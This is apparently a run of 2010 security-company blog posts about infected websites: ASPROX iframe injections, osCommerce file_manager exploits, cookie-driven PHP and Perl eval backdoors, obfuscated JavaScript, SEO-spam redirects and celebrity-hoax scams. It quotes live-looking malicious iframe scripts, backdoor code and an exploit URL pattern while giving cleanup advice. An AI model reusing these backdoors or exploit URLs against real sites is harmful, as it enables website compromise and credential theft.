Over the past week we’ve been seeing a lot of infected websites that have an iframe that contains one of these two URLs:

nutcountry.ru:8080/index.php parkperson.ru:8080/index.php

A little searching found that approximately 25,000 web pages have the nutcountry.ru:8080/index.php iframe and another 516 web pages reference parkperson.ru:8080/index.php iframe.

What’s interesting is that none of the websites listed in the Google search for either of these two iframes, are listed with “this site may harm your computer” label.

We checked the Google Safe Browsing Diagnostic for nutcountry.ru and it shows:

It appears that Google just listed nutcountry.ru on 8-03-2010 which would explain why the web pages listed in a Google search aren’t showing the warning, “this site may harm your computer”.

And for parkperson.ru we found this:

parkperson.ru Google Safe Browsing Diagnostic page

Shows that as of 8-04-2010, Google has not found this site to be harmful or suspicious.

We attempted to download the files from parkperson.ru, or watch what infection might occur if visited and found that the domain does not exist and neither does nutcountry.ru.

What does all this mean?

It means, that over 25,000 websites were infected, but with an iframe that is harmless because the URL inside the iframe doesn’t go anywhere.

The other interesting aspect of this infection is that all the web pages appear to be ASP code (.asp or .aspx). Based on the location of the harmless iframes, it appears to be another ASPROX infection.

If it is ASPROX, you’ll probably see the iframe in your SQL database. Based on the location of where the iframe appears in the web pages, it’s not a simple iframe injection. The iframe is actually buried in your SQL database. This will make it more difficult to remove. You should consult the services of a database administrator or a security company that knows SQL (yes we do!).

The next thing will be to determine how the code was inserted. This type of infection is referred to SQL injection. This happens when the input from a form or dynamically generated web page isn’t properly sanitized. If there’s a code plugin you’re using, or utilizing some standard software package in your .ASP code, please check for security updates. If you’ve had a programmer create something for you, contact them and have them check over all the code they created for you. Some where on your site you have a SQL injection vulnerability and it needs to be closed.

As stated, this time, the domains included in the iframe don’t exist. However, the next time, your visitors could get infected and your site could be blacklisted by Google and many other services.

If you need assistance with this, please send me an email at traef@wewatchyourwebsite.com.

If you have other information about this infection, please post it as a comment.

Thank you.

During the past 10 days we started seeing a number of websites using osCommerce v2.2 being infected.

The infection usually included some randomly named folder with a list of files in them. Some of the folder names we’ve seen include:

• catalog
• feeds
• image
• scripts
• items
• rss
• inventory
• visual

The names are common, but are randomly selected by the hacker infecting the website.

Inside the folder are various files, some .html some .php – all no good.

There is usually at least one file that starts with:

set_time_limit(9999999);

This file actually looks for files with one malscript already injected and replaces it with a newer malscript.

For instance, some of them look for:

hxxp://nt002.cn/E/J.JS

and replace it with:

hxxp://nt02.co.in/3

It appears to place these malscripts immediately after the closing body tag.

Frequently we’ve also found various backdoors (shell script) files.

These backdoors look for any .conf files (configuration files) especially from:

• httpd.conf
• vhosts.conf
• proftpd.conf
• psybnc.conf
• my.conf
• all .conf files
• all. .pwd files
• all .sql files
• all .htpasswd files

Armed with this information, the attacker now has complete control over the website.

How to prevent this?

We’ve found a number of exploits available. One of them is a file disclosure vulnerability which means that the attacker can view files on the website.

One of the URLs follows this scheme:

hxxp>//[site]/[path]/admin/file_manager.php/login.php?action=download&filename=/include/configure.php

This particular URL would show the attacker the configure.php file. There is no patch, that we know of yet, that prevents this attack. The best advice we’ve seen is to rename the admin folder something obscure so the hackers can’t just scan your site with this URL and find the file_manager.php file.

Other exploits we’ve seen use the same basic URL but the action variable is set as follows:

admin/file_manager.php/login.php?action=save

Then a URL to a remote site that stores a backdoor shell script. This backdoor then gets saved to the website. All a hacker has to do is to access the URL:

hxxp://[site]/osCSS/[name of shell script backdoor].php

and they have remote access to the site.

Again, if the admin folder is renamed to something obscure, this attack won’t work. This type of protection is aptly named, “security by obscurity” because all you’re doing is hiding the folder from the attacker, but until an official patch is released, this seems to be the best advice.

If you’ve been attacked by this and have some further information, please post a comment or email me at: traef@wewatchyourwebsite.com

If you need help in cleaning this up and checking for all backdoors on your site, please contact me directly at: traef@wewatchyourwebsite.com

It was announced by AVG that the websites: bep.gov (Bureau of Engraving and Printing), bep.treas.gov and moneyfactory.gov were injected with a malscript:

<SCR IPT (space added)>            function addCookie(name, value, hours)            {                  var date = new Date();                 date.setTime(date.getTime()+(hours*3600000));                 var expires ”; expires=”+date.toGMTString();                document.cookie = name+”=”+value+expires+”; “;           }

document.write(‘<iframe frameborder=”0″ onload=\’ if (!this.src){ this.src=”http://grepad.com/in.cgi?3″; this.height=0; this.width=0;} \’></iframe>’); addCookie(“cook”, “1″, 24); </SCR IPT (space added)>

According to this webpage: http://news.softpedia.com/news/Department-of-the-Treasury-Website-Rigged-to-Exploit-Visitors-141277.shtml ”Panda analysts speculate that hackers used a common attack technique known as SQL injection, to compromise the U.S. Treasury website. However, other experts think the incident is related to the recent mass compromise at Network Solutions, where the website is hosted. This possibility is enforced by the use of the malicious grepad.com domain in both attacks.”

However, it could also be that someone with FTP access to the website had a virus. The virus steals FTP login credentials and sends them to a server which then infects the websites it has legitimate access to. I see no mention of that possibility. Being that this code was injected after the closing html tag, I doubt very seriously that it’s a SQL injection, possible, but highly unlikely.

Could it have been part of the larger compromise at the hosting provider? Possibly, although last I heard and read, they had cleaned that all up and I know that the first round targeted WordPress blogs, but later repeat attacks targeted all websites at the hosting provider.

 It could have been that these sites were untouched until now? We may never know. But I do know that Network Solutions has always responded quickly to infections and taken responsibility when the “stuff” hits the fan. I have applauded them before and I do so now as well.

 Could this be more finger pointing at someone other than who’s responsible? No, that never happens in the government – does it?

Please leave your comments below…

Thank you.

This attack isn’t anything new, it was used on a number of Italian sites in March 2010, but we’ve been seeing more of it infecting websites recently so I thought I’d elaborate.

Quite often when scanning or cleaning infected websites, when we see the mailcheck.php file, we also see the chat.pl file but that isn’t cast in stone. However, we have not seen chat.pl by itself. In other words, mailcheck.php can appear by itself, but chat.pl does not – at least from what we’ve seen.

The mailcheck.php files usually contains this code:

Which deobfuscates to:

if(isset($COOKIE[“PHPSESSIID”])){eval(base64_decode($COOKIE[“PHPSESSIID”]));exit;}

The chat.pl file is programmed in Perl and looks like:

#!/usr/bin/perl use MIME::Base64 ();eval MIME::Base64::decode("JGMgPSAkRU5WeyJIVFRQX0NPT0tJRSJ9O0BjID0gc3BsaXQgLzsvLCAkYztmb3JlYWNoICRhIChA\nYyl7JGEgPX4gbS9QSFBTRVNTSUlEPSguKikvO2lmIChsZW5ndGgoJDEpID4gMCkge2V2YWwgTUlN\nRTo6QmFzZTY0OjpkZWNvZGUoJDEpO2RpZSAiIjt9fQ=="); $P = "Lf'njItkk"; $WinNT = 0; $NTCmdSep = "&"; $UnixCmdSep = ";"; $CommandTimeoutDuration = 120; $ShowDynamicOutput = 1;

As you can see, this code also uses the base64 decoding even though in it’s written in Perl. Same strategy, different programming language.

With the infection of mailcheck.php and/or chat.pl, we’ve seen a number of .php and sometimes even .html files that have some PHP code inserted across the top of the file that looks like:

<?php ob_start(‘security_update’); function security_update($buffer){return $buffer.’<script language=”javascript”>function t()…

We’ve been seeing a lot of recent website infections that use highly obfuscated javascript code that decodes to a domain: yourblenderparts.ru:8080.

Many other domains are used as well such as:

• superbblender.ru
• thesuperpager.ru
• superroadmap.ru
• supersupermall.ru
• theblendertv.ru
• theblendertutorial.ru
• excellentblender.ru
• thechocolateweb.ru
• whosaleonline.ru
• worldmusicmagazine.ru
• thelaceweb.ru
• webdesktopnet.ru
• sugaryhome.ru
• homesaleplus.ru
• worldmusicmagazine.ru
• greatwebradio.ru
• avattop.ru
• recentmexico.ru
• cobalttrueblue.ru
• webnetenglish.ru
• newusaguide.ru
• livesitedesign.ru
• sitemape.ru
• samuest.ru
• pokesack.ru
• royalbling.ru
• retireterrify.ru
• thesuperexchange.ru
• snoreflash.ru
• royalbling.ru
• forredtag.ru
• newvillagefresh.ru
• hotnewgirl.ru
• yoursuperpool.ru
• buytheblender.ru

The infectious code we found was at the bottom of index.php files obviously with the <script></script> tags and generally the same code was found at the bottom of various .js (javascript) files without the script tags.

In the obfuscated code there’s usually a number of strings that look like:

if (a!=” && a=’b'){a=null}

There are of course variances to this. The variable ‘a’ can be any letter or even an underscore “_” and may consist of two letters either upper or lowercase.  The variable ‘b’ can be any letter or underscore and can actually be one or two characters and may or may not be uppercase. Other than that, they’re exactly the same.

This format will be found in the malscript in a number of places but obviously with different variables.

The string of characters that all this code works on can be in hex format, for instance:

var I=”\x68\x74\x74\x70\x3a\x2f\x2f…” (which is actually “http://”)

or it might be something like:

var M=”hOtFtOp:O/O/…” (which, when you remove the uppercase characters is actually “http://”)

In the obfuscated malscript there is also a number of variable declarations. You’ll find things like:

• var vM=new Array()
• var j=new String() (sometimes with a value inside the parenthesis)
• var Z=window
• var K=new Date()
• var G=new Regexp(…)
• var QF=document

When I see a variable declaration like: var Z=window or var QF=document, I know that somewhere in the malscript I’ll see something like: z.location or QF.write. This is a common obfuscation technique of the hackers.

In all the cases we’ve worked on with this type of infection, it’s been the result of a virus that has stolen the FTP passwords from a PC with FTP access to the website.

We’ve written about this before, but here are the steps to follow to prevent this from happening again.

1. Install a new anti-virus program. The reason is that it’s obvious that the current anti-virus software didn’t detect anything. Often times these viruses “learn” how to evade detection from the currently installed anti-virus software. Therefore, something new and different is needed to find and remove it. Many have had good results with one of the following: Kaspersky, Avast or Vipre (Sunbelt Software).
2. Change all FTP passwords. I recommend creating a new FTP account for everyone or for every PC that will be accessing the website. Then be sure that FTP logging is activated. This is important. If your website gets infected again, you can look in the logs to see who has the virus. If there’s a user named john and his username shows up in the logs from somewhere across the world, you can safely assume that it’s his username that’s been compromised.

That’s it. 2 steps. It’s easier to prevent your site from being infected than it is to recover from an addiction.

If you have more domains to add to this or would like to comment, please do so. You can leave a comment below or you can email direct at traef@wewatchyourwebsite.com

Until next time…

Over the past week, we’ve been seeing a lot of infected websites that are ranking for various movie review web pages – and these sites have nothing to do with movies!

The typical infection is a five letter .php file such as:

• juqip.php
• kirqf.php
• wxtrg.php
• mtywo.php
• tijox.php

And other file names. The common denominator here is the five letter file name. From what we’ve seen the file name doesn’t start with a vowel and it appears there is a different file name for each website. If you were to Google tijox.php you’ll only see it on one website.

For each of these sites, there is a folder named “./files”. The reason for the dot before the folder name is to hide it from many programs. For instance in the FTP program I use WS_FTP by Ipswitch, you have to specify that you want to see all listings that begin with a dot. By default, in WS_FTP, this folder won’t even show. The same is true for Linux. You won’t see the folder that begins with a dot.

All the files in the “./files” folder are put there by the hackers. The majority of them are movie reviews, but there’s also .html files in there about the Buffalo Sabres hockey team, various “Lord of War” files, Texas Lottery Pick 3 and various other frequently searched terms.

We have seen a lot of them using search terms that reference “lord of war”, but other search terms used are:

• 3 10 To Yuma Soundtrack
• death of a cheerleader wiki
• tx lottery pick 3
• sabres hockey
• strike force results hershel walker
• strike force nashville presale code
• kesha snl
• strangers on a train movie
• knights templar
• freshman fall imdb
• dazed and confused cast
• strangers on a train patricia highsmith
• luci baines johnson pictures
• bernadette protti pictures
• dan henderson vs jake shields fight video
• kelly pavlik news
• the good shepherd imdb
• acm awards 2010 voting
• doctor who victory of the daleks download
• dazed and confused lyrics
• amstel gold race 2010
• roma airport
• farley granger imdb
• tao las vegas
• mastiff
• josh selby basketball
• king mo vs mark kerr
• pavlik vs martinez undercard
• american bulldog
• kelly pavlik vs miguel espino
• kelly pavlik wiki
• sergio martinez next fight
• joe mather girlfriend
• batman and robin comic
• bernadette protti
• guillain barre syndrome wikipedia
• shake weight reviews does it work
• strikeforce results january 30
• the hitcher movie
• psn code generator
• amanda peterson photos
• elearning
• tea leoni
• patrick dempsey
• unemployment
• and many, many others

However, the real interesting information is in the query string. The query string has the “?” after the .php file name, and then it uses a variety of identifiers. Sometimes it’s a single letter other times we’ve seen words like;

• sell
• in
• post
• off
• do
• topic
• page
• pageid
• go

these are followed by the search term. In the search term the spaces are converted to %20 possibly to further try and obfuscate their work.

We found that the majority of sites with this infection have already been found by Google and labeled, “this site may harm your computer”. Unfortunately not all of them have been flagged yet. I say unfortunately, because it seems as though that’s the way most website owners or webmasters find out that a website has been infected – by Google flagging it and sending an email to the email addresses listed in the Google Webmaster Tools.

If you were to Google, “the hitcher movie”, many listings appear that have the warning this site may harm your computer. Some don’t. Anyone looking to find information about “the hitcher movie” might click on one of the sites that hasn’t been labeled by Google yet and here’s what would happen.

First, inside the “./files” folder, there is typically a file named “b.log”. This file contains the website that these files redirect to when clicked on only from a Google Search Results Page (SERP).

For instance in one investigation the b.log file looked like this:

kqx7ea.xorg.pl|1271657010

Anyone clicking on a Google SERP for this particular website would be directed to:

http://kqx7ea.xorg.pl/in.php?t=cc&d=18-04-2010_x_1816&h=kdsproductions.com&p=http%3A%2F%2Fwww.google.com%2Fsearch%3Fhl%3Den%26rlz%3D1T4GPTB_enUS290US290%26q%3Dthe%2Bhitcher%2Bmovie%26start%3D10%26sa%3DN http://kdsproductions.com/ekctj.php?p=the%20hitcher%20movie

Which then redirects to:

http://www4.nomikals2.com/?p=p52dcWltbV%2FRlsijZFaZp29e2KHObWOXk5ecmmFoZG6a http://kqx7ea.xorg.pl/in.php?t=cc&d=18-04-2010_x_1816&h=kdsproductions.com&p=http%3A%2F%2Fwww.google.com%2Fsearch%3Fhl%3Den%26rlz%3D1T4GPTB_enUS290US290%26q%3Dthe%2Bhitcher%2Bmovie%26start%3D10%26sa%3DN

Which redirects to:

http://www2.scanprotection34p.net

Which wants to install a fake (rogue) anti-virus program on your PC.

What to look for

Look in your root folder for your website. It might be public_html or just html. Look for any .php files that have five letters that look totally random. From what we can tell, they are totally random. Then make sure that your FTP software is showing hidden files and folders. Look for a folder named “files” and see if there aren’t a whole lot of .html files in there that you’re quite certain, you didn’t put there.

What to do

If you do find these instances on any of your websites, remove the ./files folder and the five letter randomly named .php file. There may also be .php files installed in your images folders. Search all files for the string:

eval(base64_decode( followed by a long list of characters. Don’t just delete this file, but examine it. If you need help decoding it, please email at: traef@wewatchyourwebsite.com

In all our cases, we’ve found that the culprit was a virus on a PC with FTP access to the infected website. We’ve seen the FTP logs and we’ve identified the IP addresses that some of these files came from.

As with many website infections, the first step is change all FTP passwords and do not save them on any PC – yet.

Then obviously remove all the files identified above.

Next, install a different anti-virus program on your PC. The reason is that these viruses and trojans know how to evade detection of the anti-virus program that’s already been installed when the virus first infected the PC. In order to find and remove the viruses you have to install a different anti-virus program.

Many have had good success with one of the following: Kaspersky, Avast or Vipre (Sunbelt Software). If you’re already using one of these, then try one of the other two – it has to be different.

Once you’ve found and removed the virus or trojan, you can then use your FTP program with the new passwords and feel safe.

The last thing to do is to Request a Review from your Google Webmaster Tools – if your site has tagged with the warning this site may harm your computer.

All of our clients prevented this warning by our monitoring service. While we couldn’t prevent their PCs from getting infected, we could detect when their websites changed. We immediately removed the files and alerted them to take the above steps to clean their PCs. Their websites were never blacklisted by Google because of our automated cleaning process.

If you’d like to be protected, please send me an email: traef@wewatchyourwebsite.som

If you have any comments, please feel free to register and let me know your thoughts or experience with this type of infection.

We started seeing a lot of websites infected with a malscript that looks like:

iframe frameborder="0" onload=' if (!this.src) { this.src="http://binglbalts.com/grep/"; this.height=0; this.width=0; } '>/iframe

In Joomla sites we’ve found it in /templates/index.php toward the bottom. In WordPress blog sites, we’ve seen it in the footer.php file.

We’ve usually been finding them toward the bottom of webpages. As of this writing the binglbalts.com domain is still active.

It turn out the result of these infections has been stolen FTP credentials. We’ve been able to view the logs of numerous sites that have been hacked by binglbalts.com and we can see the IP addresses of where the infection is coming from.

To clean this, first change all FTP passwords.

Second, you’ll have to download your entire site onto your PC or Mac. Then use grepWin and use this as the search string:

iframe/s*frameborder=\"0\" onload=\' if \(\!this\.src\)/s*\{/s*this\.src=\"http:\/\/binglbalts\.com\/grep\/\"; this\.height=0; this\.width=0;/s*\} \'>

On Sunday, as my wife was on the Internet she told me that she had seen online where people were claiming that Bill Cosby had passed away.

Me, being the skeptic that I am, immediately jumped on-line and started scanning the listings from a Google search about Bill Cosby is dead. I know when I hear terrible news like this coming only from on-line sources, that it might be a hoax. Consider my posting about the hoax of Johnny Depp dying in a car crash http://www.wewatchyourwebsite.com/wordpress/?p=321. The hackers seem to create their own news when none exists.

With the Bill Cosby news (or none news), I found that a number of people used Twitter to spread the news, which got some buzz going. People were blogging about and comments were posted like: “I’ll miss him.” which just drives the Google Trends and Yahoo! Buzz through the roof.

As I’ve said before, cybercriminals know the game maybe better than most of us – and they play it well.

As far as the websites that were first reporting on this, one of them was another CNN look-a-like similar to the Johnny Depp scenario. Only this time the website itself was attempting a drive-by infection. At times the drive-by seemed to be seeking Internet Explorer 6 visitors. Other times during the day it was just redirecting to various infectious websites where the mother-lode of of infection code was hiding.

The only safe way to check out any “news stories” you hear about is to go directly to your favorite news website and search for the item of interest. That way, you’re limiting your exposure.

Just thought you’d like to know…

In a research conducted by Kaspersky Lab, Dmitry Bestuzhev claimed, “When the value of stolen credit cards and other types of credentials are added up, hackers can easily take in $1,000 worth of data from just one hacked computer.”

Quite often I’m asked, “Why do hackers hack?”

I’ve always responded with various examples of how the hackers (cybercriminals) make money. Many often think that it’s just stolen credit cards, however, in the last year, I’ve seen the tide moving away from just credit cards to various other forms.

For instance, do a Google search on “pay per install” and you’ll find an entire underground where people are paid for installing “crapware”. This is software that doesn’t really add any functionality for the end-user. What it does do is provide the people paying the hackers a way to make money from displaying ads or in some cases, for remotely controlling the PC.

Hackers also use infected PCs to send SPAM. Don’t think SPAM sells any products? Do you think that as valued as a compromised PC is to hackers, they’d risk being eliminated if it didn’t produce some return?

Obviously statistics aren’t available for what kind of returns they get. Numerous requests for interviews were all declined by those in the hacker communities.

In addition to stolen credit cards, pay per install and SPAM, Bestuzhev has seen Gmail accounts for sale on Russian hacker forums, with asking prices of$82, RapidShare accounts going for $5 per month, as well as Skype, instant messaging and Facebook credentials also being offered. He recently witnessed one offer to buy a hacked Twitter account for about $1,000. The particular Twitter account had 320 followers.

Now there’s a new Internet Marketing strategy – build up a quick Twitter following then sell it to hackers.

For those who are always wondering why hackers hack, it’s because they make money – lots and lots of money.

As our focus is website security, imagine why they want to infect so many PCs with their drive-by downloads. With so many people having Twitter accounts, is it any wonder why they want your website?

Think about the numbers. If the hackers are willing to pay $1,000 for a Twitter account with only 320 followers, imagine how much they can make off of that. The hackers know numbers. They know that if something costs them $1,000, it must be able to generate at least 10 – 20 times that. It’s all about risk versus reward.

How would you know if your PC is hacked? Would you know if your Twitter or Facebook account were hacked? How many people could be infected from your: Twitter page, Facebook site or website?

I just thought that those of you who follow me on this blog, might want to know.

An educated website owner is the best kind.

Let me know your thoughts or comments on this.

I read recent reports about how the famous actor Johnny Depp died in a car crash – this is a scam!

I guess the cybercriminals didn’t get enough traffic out of luring the soft-hearted to fake “Save Haiti” websites so they created their own high-traffic story.

Oh don’t worry. Unlike many of the cybercriminal schemes where just visiting a website will attempt a barrage of PC infections, this one lures you into wanting to download their “mother lode of infectious code.”

As of Sunday January 24, 2010, the search term: johnny depp car crash, was searched over 13 million times. It was even a trendy topic on Twitter which helped add fuel to the fire.

Like I’ve stated before, hackers or cybercriminals, which ever you prefer, know how the human mind works. They know we initially read a story, then if there’s pictures or better yet – a video, we’re going the distance for the full effect.

If you Google, johnny depp car crash, you’ll see one listing from CNN. This might lead you to believe that this story is true. If CNN covers it, it must be true. However, clicking on the link to the “CNN” story, will take you to a website that looks like CNN, but it’s not.

The site simply whets your appetite for blood and guts.

After reading that story, you’ll probably want to see some of the videos taken of the car crash. Maybe you can see the famed actor dead on the ground or something almost as gruesome. So your next search is for videos of the Johnny Depp car crash.

Many sites were offering those.

Unfortunately, or fortunately, you couldn’t watch the video unless you had the correct video software – and you could download it right there, if you really, really wanted to watch the video.

BAM!

They got you. The video software (codec) wasn’t really going to let you view the video. What it was going to do was let the hacker have access to your PC – whenever they wanted it.

The moral of this story is, don’t believe everything you hear or read. Don’t be a victim of a scam that some cybercriminal has concocted. If some famous person has passed away, watch TV. Go to CNN.com and search for it there. Don’t fall into the bottomless pit of despair by allowing yourself to be lured into one of these scenarios.

Remember, that as a website owner, your site could become infected by something you did online, a story you read, or a video driver you downloaded. That could be more damaging than not being totally up-to-date on whether or not someone famous died.

That’s just my opinion, what’s yours?